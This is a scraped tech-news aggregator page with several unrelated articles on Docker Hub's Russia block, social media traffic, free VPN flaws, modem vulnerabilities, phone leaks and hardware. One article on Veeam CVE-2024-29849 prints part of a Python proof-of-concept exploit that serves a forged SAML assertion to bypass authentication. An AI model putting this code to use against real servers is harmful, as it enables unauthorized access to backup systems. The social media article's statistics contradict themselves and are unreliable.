Docker Hub Services No More Available In Russia

andreasc
-
0
Docker Hub Services No More Available In Russia
[ad_1]

Shortly after multiple users complained online about the unavailability of Docker Hub services, it’s now official that Docker Hub services have been suspended in Russia. The platform cites US export laws as a reason to pull out their services post-Russia-Ukraine war.

Docker Hub Ends Operations In Russia Sans Prior Notifications

Reportedly, the developer platform Docker has blocked Russian users from accessing it due to US laws. This development came as a shock to many Russian developers who relied on Docker Hub.

Specifically, Docker Hub is the main public registry for the developer platform-as-a-service giant Docker, facilitating the developer community globally. The platform employs a freemium model and has become beneficial for most users as a seamless cloud platform for sharing, storing, and managing container images.

The matter gained traction in the media following multiple complaints from users regarding the inaccessibility of Docker Hub services in Russia. Besides highlighting the matter on social media sites like Reddit, users also shared their concerns on the official Docker forums.

Eventually, Russian media confirmed that Docker blocked its services for Russian users, citing compliance with US export control laws as the reason. Moreover, besides banning Russian users, Docker also restricted users from five other countries: Iran, Cuba, North Korea, Syria, and Sudan.

Users trying to access Docker and facing the restriction witness the following message from the platform.

Since Docker is a US company, we must comply with US export control regulations. In an effort to comply with these, we now block all IP addresses that are located in Cuba, Iran, North Korea, Republic of Crimea, Sudan, and Syria. If you are not in one of these cities, countries, or regions and are blocked, please reach out to https://hub.docker.com/support/contact/

Since Docker mentioned blocking IP addresses from these regions, users may still be able to access the platform using a VPN. In fact, VPNs are often used for accessing blocked sites and services globally. Nonetheless, this isn’t a fool-proof strategy due to potential IP/DNS leak issues that may trigger the ban if the platform knows the real IP addresses or if Docker implements measures to detect and block VPN users.

Let us know your thoughts in the comments.


[ad_2]
Source link

Last year’s top social media platform might surprise you

andreasc
-
0
Last year’s top social media platform might surprise you
[ad_1]
Do you consider YouTube to be a social media platform? Lifesight.io, a marketing research company, puts YouTube in that category and calls it the top social media platform based on the number of visits. Last year, the streaming video provider hosted 1.35 trillion visits, up 80.49% from the 263.3 billion that came to the platform in 2019. At 67%, the majority of YouTube visitors are male and nearly 70% are viewing YouTube videos on their mobile devices.
One of the now iconic ads that Apple released for the original iPhone in 2007 was all about the YouTube app that was pre-installed on iOS until iOS 6. Apple even took a moment in the advertisement to point out how unusual it was for a phone to have a YouTube app. As the commercial showed a skateboarding bulldog, the voice-over announcer said, “Maybe the biggest surprise is finding YouTube on your phone.”

While YouTube attracted the largest number of visitors to a social media platform in 2023, one of the biggest growth rates in the genre over the five years from 2019-2023 belonged to TikTok. With a growth rate during the five years reaching a stunning 6015%, the controversial social media player saw the number of visits rise from .7 billion in 2019 to 41.8 billion last year. TikTok is a “mobile-centric” site that is just as popular with men as women.

The number of visitors to TikTok soared over 60 times from 2019 to 2023 - Last year's top social media platform might surprise you

The number of visitors to TikTok soared over 60 times from 2019 to 2023

Overall social media visits rose 70.56% worldwide during the five years from 2019 to 2023 as the number of visits rose to 1.98 billion from 582.9 billion. The top three countries to host visitors to social media platforms last year were the U.S. (436.1 billion visitors), India (171.8 billion), and Brazil (123 billion). At 68.65%, most visitors to social media sites were male (leaving 31.35% for females). 59.10% preferred to visit these sites using their mobile devices.

The top ten social media platforms of 2023 include:

YouTube-streaming video site hosted a leading 1.35 trillion visitors in 2023.

Facebook-with 216.4 billion visitors last year, Facebook had a very modest five year growth rate of 15.33% and lost its spot at number one.

X (formerly Twitter)-male-dominated platform had 112.9 billion visits last year, up from 41.6 billion in 2019. Over 77% of visitors view X on their mobile devices.

Instagram-another mobile-centric platform with a majority of male users, Instagram counted 87.3 billion visits in 2023, a 62.40% increase from 2019.

Reddit-yet another male-dominated mobile-centric platform that features community-driven content.

TikTok-controversial platform saw the number of visits rise over 60 times between 2019 and 2023.

What’sApp-Large number of desktop users as What’sApp is used for cross-platform communications.

LinkedIn-professional networking platform had 20.5 billion visits last year.

Twitch-live streaming gaming platform counted 20 billion visitors in 2023, predominantly male and mobile.

Quora-19 billion visits last year as the platform shares knowledge and passes along information.

How many of the top-ten social media sites do you frequently visit?


[ad_2]
Source link

Free Android VPNs Suffering Encryption Failures, New Report

andreasc
-
0
Free Android VPNs Suffering Encryption Failures, New Report
[ad_1]

VPN apps for Android increase privacy and security over the internet since connection data is encrypted, consequently making it impossible for hackers or other parties to access communication data. 

They also help unblock region-restricted content through IP address hiding, support anonymity on the Internet, and protect secure information more so when using insecure Wi-Fi.

Cybersecurity researcher Simon Migliano at Top10VPN recently discovered that free Android VPNs are suffering encryption failures.

Free VPNs Encryption Failures

Encouraged by the growing trends of government-imposed internet restrictions worldwide and subsequent appeal for virtual private networks (VPNs), this study examines the privacy and security issues about free VPN applications.

With ANYRUN You can Analyze any URL, Files & Email for Malicious Activity : Start your Analysis

Since 2018, the total installations of the 100 most popular free Android VPNs have skyrocketed from 260 million to over 2.5 billion.

This in-depth research evaluated the privacy and security risks associated with the top 100 free Android VPN apps, which have garnered over 2.5 billion total installations due to increasing global demand.

By testing each app on separate devices, using various tools within an isolated environment, the study identified shocking flaws in encryption, data leakage, and privacy-infringing functions in the codes of these apps.

Most importantly, it was discovered that most of them openly shared personal user information directly with firms such as “Yandex” and “Bytedance,” consequently showing a contradiction between serving people without charging them and safeguarding a VPN’s real confidentiality goal.

For those who cannot afford to pay for VPNs, it is possible to find good, free ones by doing extensive research. However, affordable paid options are more reliable.

The tests revealed worrying encryption flaws and data leakage among all 100 free VPN applications.

11 experienced full-scale breakdowns in the encryption process, slightly over a third deployed an inadequate form of encryption, and few used the best hashing algorithms or TLS 1.3.

This resulted from 88 leaking information, including 83 that disclosed DNS requests and 79 that did not tunnel all traffic. Over half of these applications suffered from connection instability.

A comprehensive study on user privacy and security vulnerabilities, conducted through Wireshark traffic analysis within a unique test environment, unraveled such extensive vulnerabilities.

Here below, we have mentioned the names of those 11 VPNs:-

  • HTTP Injector
  • Phone Guardian VPN
  • VPN Private
  • iTop VPN
  • PotatoVPN
  • Swift VPN
  • Tenta Private VPN Browser
  • Maple VPN
  • GoFly VPN
  • AVG Secure Browser
  • VPN Satoshi

11 apps were found to have no encryption at all, consequently exposing the browsing activities.

Many of these data leaks were widely spread, 83 of them leaked DNS requests and only 79 could tunnel all traffic.

In addition, many of the investigated apps (96) contained code with potential privacy impacts but some had first-party location tracking together with permissions.

More worrying were those with 12 apps, including third-party precise location tracking code and permissions; some even track in the background.

The main contributors to major privacy concerns included SDKs such as ByteDance, Yandex, and Facebook embedded in popular apps.

In total, during this test period, 71 applications shared personal information while their VPN was still running.

Looking for Full Data Breach Protection? Try Cynet's All-in-One Cybersecurity Platform for MSPs: Try Free Demo 


[ad_2]
Source link

Detour ahead: latest Google Maps beta disrupts Android Auto navigation

andreasc
-
0
Detour ahead: latest Google Maps beta disrupts Android Auto navigation
[ad_1]
The latest beta update to Google Maps is causing some Android Auto users to experience issues with the navigation app. These things are always possible, that’s why it’s a beta version, but this issue seems to be making the entire app crash instead of just glitching.

Several forum reports indicate about Google Maps crashing in Android Auto. Luckily, the rest of the Android Auto experience works. Launching Google Maps is what seems to be an issue right now. However, the app on phones is fully functional.

It seems that Google Maps for Android beta version 11.132.0100 is the culprit. This version was released on June 3. The issue impacts Pixel, Samsung Galaxy, and other Android phones, and we expect Google to issue a patch to fix it shorty.
Some users on the stable version of Google Maps have also reported issues, but the majority of reports come from people on the beta. If you want to leave the beta, you can do so through the Play Store. After that, find App Info, then go to the overflow menu and tap on “Uninstall updates”. Then, return to Google Play and update to the latest stable version.

This bug seems annoying but at the same time, beta versions are still versions in development and I find it understandable that they might not work as expected. After all, that’s a risk all users on beta should be well aware of. Getting to see cool features before they’re officially launched comes with this trade-off, usually.

Izzy, a tech enthusiast and a key part of the PhoneArena team, specializes in delivering the latest mobile tech news and finding the best tech deals. Her interests extend to cybersecurity, phone design innovations, and camera capabilities. Outside her professional life, Izzy, a literature master’s degree holder, enjoys reading, painting, and learning languages. She’s also a personal growth advocate, believing in the power of experience and gratitude. Whether it’s walking her Chihuahua or singing her heart out, Izzy embraces life with passion and curiosity.


[ad_2]
Source link

Cox Modem Vulnerabilities Risked Modems To Hacking

andreasc
-
0
Cox Modem Vulnerabilities Risked Modems To Hacking
[ad_1]

A researcher discovered numerous security flaws in Cox modems that allowed device hacking to remote attackers. Exploiting the vulnerabilities could let an adversary take control of a target Cox modem, execute commands, and meddle with the device settings.

Cox Modem Vulnerabilities Allowed Remote Attacks

According to a recent post from the researcher Sam Curry, numerous vulnerabilities impacted the security of Cox modems, allowing remote modem hacking.

As explained, the series of vulnerabilities together led to an authorization bypass issue in the backend API that allowed an adversary to take over target Cox modems. Abusing the exposed APIs could let the adversary access customers’ personal information, such as names, phone numbers, email addresses, and account numbers. Moreover, the APIs also exposed WiFi passwords and hardware MAC addresses of connected devices. That means using this particular vulnerability risked all connected devices.

Since the vulnerability existed in these modems for years, it made millions of devices vulnerable to security threats.

Describing further, the researcher explained that the vulnerabilities resulted in around 700 exposed APIs, some of which could even allow admin access, letting an attacker execute unauthorized commands, modify device settings, and gain ISP-level permissions.

Patch Deployed

Considering that Cox ranks among the top US broadband, telephone cable, and phone carrier services, the proportionately huge number of vulnerable devices indicates the extent of damage in case of malicious exploits.

Thankfully, following the researcher’s report, Cox patched the vulnerabilities within 24 hours, preventing any active attacks. The firm also assured that it had detected no exploitation attempts in the past.

However, an interesting aspect of the researcher’s report is the active hacking attack on his own modem. The unknown adversary kept the researcher’s device compromised for quite some time, remaining undetected all the while. Though the researcher tried to trace the unknown adversary, he could spot the vulnerabilities and get them patched, remaining unsuccessful in tracking the attacker(s) on his own device.

Anyhow, now that Cox has deployed the patches, users must ensure that their devices are updated with the latest patches to address the modem vulnerabilities.

Let us know your thoughts in the comments.


[ad_2]
Source link

Galaxy Z Fold 6 to recycle camera hardware from the Fold 5

andreasc
-
0
Galaxy Z Fold 6 to recycle camera hardware from the Fold 5
[ad_1]

It seems like the Galaxy Z Fold 6 will recycle the Galaxy Z Fold 5’s camera hardware. This information comes from Ice Universe, as he claims that the Galaxy Z Fold 6 will have the exact same cameras as its predecessor.

The Galaxy Z Fold 6 will recycle camera hardware, a well-known tipster claims

In his X post, he was very clear when stating that all of the phone’s cameras will be the same. He mentioned rear cameras, a front camera, camera specifications in general, UPC, and aperture value. There will be no change whatsoever.

If that ends up being the case, Samsung really is risking annoying its consumers. If we take into account the Galaxy Z Fold 4, the company has been pushing this camera hardware for far too long.

There are other foldable smartphones in the market that have much better camera hardware at this point. They also offer better camera performance as a result of that, and improved image processing too, of course.

Samsung could end up improving its camera algorithms and whatnot, but there’s only so much the company can do with this camera hardware. Many people have been expecting an improvement in that regard.

The source said that AI will be the main selling point for Samsung’s new foldable

The tipster was asked “what’s the selling point” of the phone then, considering that not much will change, aside from the aspect ratio. He said that Samsung will focus heavily on AI, and will push it as the main selling point.

Let’s hope that the company will change things up with the Galaxy Z Fold 7 next year. The competition is going forward in a number of ways, and it just feels like Samsung is lagging behind.

The company could, of course, bounce back really fast, as it does have the knowledge and resources to do that. It remains to be seen if things will change next year.


[ad_2]
Source link

Apple is now the home of one of the most popular book clubs

andreasc
-
0
Apple is now the home of one of the most popular book clubs
[ad_1]
Apple’s e-book reading app has just become the official audiobook home of one of the most popular book clubs, Reese’s Book Club. Founded by iconic American actress and producer Resse Witherspoon, the book club puts women at the center of stories each month.

The partnership between Apple Books and Reese Witherspoon involves a dedicated page for users to follow to be notified about new monthly picks, which will be featured on Apple’s app.

This dedicated page also allows users to browse books from previous months that were spotlighting women, as well as get access to themed editorial collections curated exclusively by Apple and Reese’s Book Club editors.

But wait, there’s more! Apple announced that its Books app will offer exclusive pricing promotions. On top of that, Hello Sunshine authors, another company founded by Reese Witherspoon that aims to empower women, will curate audiobook recommendations, thus helping readers to choose from more stories that will be revealed only on Apple Books.

Apple is now the home of one of the most popular book clubs

Starting this week, Apple Books users can find Reese’s Book Club in the app and learn more about the latest selection, including the newly announced pick for June, which is “The Unwedding,” by number 1 New York Times bestselling author Ally Condie.

This is not the first time that Apple and Reese Witherspoon teamed up for a project. Reese’s Hello Sunshine has already produced the Apple TV+ original series The Last Thing He Told Me, which was renewed for season two, and the Critics Choice Award-winning series “The Morning Show,” among other things.

[ad_2]
Source link

Poc Exploit Released For Veeam Authentication Bypass Vulnerability

andreasc
-
0
Poc Exploit Released For Veeam Authentication Bypass Vulnerability
[ad_1]

A proof-of-concept (PoC) exploit has been released for a critical authentication bypass vulnerability in Veeam Backup Enterprise Manager.

The vulnerability, identified as CVE-2024-29849, has a CVSS score of 9.8, indicating its high severity.

This article delves into the details of the vulnerability, the exploit, and the potential implications for organizations using Veeam’s software. 

On May 21, 2024, Veeam published an advisory regarding CVE-2024-29849, a critical authentication bypass vulnerability in Veeam Backup Enterprise Manager.

This flaw allows an unauthenticated attacker to log in to the Veeam Backup Enterprise Manager web interface as any user, effectively bypassing all authentication mechanisms.

The vulnerability resides in the Veeam.Backup.Enterprise.RestAPIService.exe, a REST API server component of the Veeam Backup Enterprise Manager software.

This service listens on TCP port 9398 and serves as an API version of the main web application, which operates on TCP port 9443. 

Analyze any MaliciousURL, Files & Emails & Configuration With ANY RUN Start your Analysis

Technical Analysis of the Exploit

The PoC exploit, developed by Sina Kheirkhah of the Summoning Team, leverages the vulnerability by manipulating the Veeam.Backup.Enterprise.RestAPIService.CEnterpriseRestSessionManagerControllerStub.LogInAfterAuthentication method.

This method is executed when an authentication request is received, and the exploit targets specific checks and conditions within this method to bypass authentication.

The exploit involves crafting a malicious SAML assertion and sending it to the vulnerable Veeam service.

The SAML assertion is designed to trick the service into validating the token and granting access to the attacker.

The exploit script, written in Python, automates this process and includes a callback server to handle the malicious SAML assertion.

Diagram illustrating the authentication bypass exploit process.
Diagram illustrating the authentication bypass exploit process.

Proof of Concept (PoC) Code

The PoC code for the exploit has been made publicly available, allowing security researchers and potentially malicious actors to understand and replicate the attack.

Below is a snippet of the PoC code:

from http.server import HTTPServer, SimpleHTTPRequestHandler

import ssl

import warnings

import base64

import requests

from urllib.parse import urlparse

from threading import Thread

import os

warnings.filterwarnings("ignore", category=DeprecationWarning)

requests.packages.urllib3.disable_warnings()

class CustomHandler(SimpleHTTPRequestHandler):

    def do_POST(self):

        xml_response=""'<saml2:Assertion xmlns:saml2="urn:oasis:names:tc:SAML:2.0:assertion">

                            <saml2:Issuer>https://192.168.253.1/STSService</saml2:Issuer>

                            <saml2:Status>

                                <saml2:StatusCode Value="http://docs.oasis-open.org/ws-sx/ws-trust/200512/status/valid"/>

                            </saml2:Status>

                          </saml2:Assertion>'''

        self.send_response(200)

        self.send_header("Content-type", "text/xml")

        self.end_headers()

        self.wfile.write(xml_response.encode("utf-8"))

        print("(+) SAML Auth request received, serving malicious RequestSecurityTokenResponseType")

def start_callback_server(ip, port):

    httpd = HTTPServer((ip, port), CustomHandler)

    ssl_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)

    ssl_context.load_cert_chain("server.pem", keyfile="key.pem")

    httpd.socket = ssl_context.wrap_socket(httpd.socket, server_side=True)

    print(f"(*) Callback server listening on https://{ip}:{port}")

    httpd.serve_forever()

# Additional code for exploit execution...
Figure 2Snippet of the PoC exploit code.
Figure 2Snippet of the PoC exploit code.

Implications and Mitigation

The release of this PoC exploit underscores the critical nature of CVE-2024-29849.

Organizations using Veeam Backup Enterprise Manager are at significant risk if they do not apply the necessary patches and mitigations.

An attacker exploiting this vulnerability could gain unauthorized access to sensitive data and systems, leading to potential data breaches and other security incidents.

Veeam has recommended immediate updates to their software’s latest version, including patches to address this vulnerability.

Additionally, organizations should review their security configurations and consider implementing additional layers of security, such as multi-factor authentication (MFA) and network segmentation, to mitigate the risk of exploitation. 

The discovery and public release of the PoC exploit for CVE-2024-29849 highlight the ongoing challenges in securing enterprise software.

It reminds organizations to stay vigilant, keep their systems updated, and adopt robust security practices to protect against emerging threats.

Looking for Full Data Breach Protection? Try Cynet's All-in-One Cybersecurity Platform for MSPs: Try Free Demo


[ad_2]
Source link

iPhone 16 battery leak shows larger capacity & metal casing

andreasc
-
0
iPhone 16 battery leak shows larger capacity & metal casing
[ad_1]

Many people complained about the overheating issue of the iPhone 15 series. Apple promised to solve the overheating problem through software updates. However, the issue still persists for many users. The problem could be due to a hardware design of the previous model.

iPhone 16 battery leak shows metal casing & bigger capacity

Now a leak from tipster Majin Bu on X has revealed the battery on the iPhone 16. The image suggests that Apple doesn’t want to make the same mistake with the iPhone 16 series. According to the leak, the battery of the iPhone 16 will equip a metal case outside the soft plastic pouch. The metal casing should help dissipate the heat from the battery. It should be especially helpful when the phone is charging, as this is the scenario where the battery cell heats up the most.

The battery has a similar shape, but the engraving on the metal casing shows “3597mAh”. For context, the iPhone 15 has a smaller 3349 mAh battery.

The leaked images of the iPhone 16 battery show a frosted finish on the case. Apple has also redesigned the connectors. Apple reportedly opted for a glossy surface for the metal casing at first but later on decided to go for a frosted finish.

The use of a hard case for the batteries was first leaked in November by tipster @KosutamiSan. He also claimed that the iPhone 16 series will switch to a graphene thermal system, as it offers excellent thermal conductivity (better than copper).

The latest leak is about the base iPhone 16. However, the tipster @KosutamiSan already shared leaked images of the iPhone 16 Pro battery back in April this year. According to the leak, the battery for the iPhone 16 Pro also has a frosted metal casing and a capacity of 3355mAh. This is around a 2.4% increase as compared to the iPhone 15 Pro.

iPhone 16 could use a different battery technology or it could be heavier

iPhones were becoming heavier and Apple had to find a solution to it. They replaced the stainless steel middle frame of the Pro models with titanium to reduce the weight. As a result, the iPhone 15 Pro became significantly lighter (187g) as compared to its predecessor (206g).

While the iPhone 15 (171g) weighs very similar to its predecessor, the extra metal inside the iPhone 16 may significantly increase the weight. A higher battery capacity will also contribute to the increased weight.

Nonetheless, we can only observe the exterior of the battery pack. Apple might be using a different battery technology with higher energy density, as seen in some book-style foldables.

This is plausible since the metal casing increases the battery’s thickness, which could require a redesign of the internal components or result in a thicker phone.


[ad_2]
Source link

Best of Computex 2024: MSI X870 Motherboards

andreasc
-
0
Best of Computex 2024: MSI X870 Motherboards
[ad_1]

MSI’s new motherboards are stronger and easier to assemble than ever before

At Computex this week in Taiwan, MSI introduced the X870 motherboards, which perfectly compliment the new AMD Ryzen 9000 lineup of processors. It also includes PCIe Gen 5.0 and M.2 slots, which makes for a great experience in both graphics and storage.

While we don’t yet have pricing or availability for the MSI X870 motherboards, we do know that these will be some of the best motherboards launching this year hence why the MSI X870 Motherboards have earned a Best of Computex 2024 award from Android Headlines.

MSI includes cutting-edge technologies in the new X870 motherboards

As you’d expect from a brand new lineup of motherboards, MSI is supporting the most cutting-edge technologies, including USB 4 connectivity, which will offer speeds of up to 40GB per second. It’s been outfitted with the MAG X870 TOMAHAWK WiFi and PRO X870-P WiFi with cutting-edge 5G LAN, WiFi 7, and Bluetooth 5.4. Basically, it is the latest and greatest tech that will be available in 2024.

When these motherboards become available – likely later this year – it’s definitely going to be the one you want to put in your rig. MSI is also focusing on the ease of assembly with these new motherboards. GPUs getting larger and heavier can be a strain on the motherboard. So MSI is also offering three additional anchor points and using a thicker material for the PCIe slots, which should solve that problem. These are 121% stronger than previous-gen solutions. And the slots are able to withstand twice the weight of the graphics card than before.

Continuing with the ease of assembly theme, MSI has also made it even easier to install an M.2 SSD into your rig with the X870. Just a simple push locks the M.2 SSD into place, and removing it is as simple as a slight pull to the left. It really can’t get any easier than that.

MSI uses cutting-edge technologies and makes installation and upgrades a piece of cake with the X870 motherboards. That’s why we have awarded these new motherboards the Best of Computex 2024 award.


[ad_2]
Source link
1...146147148...1,471Page 147 of 1,471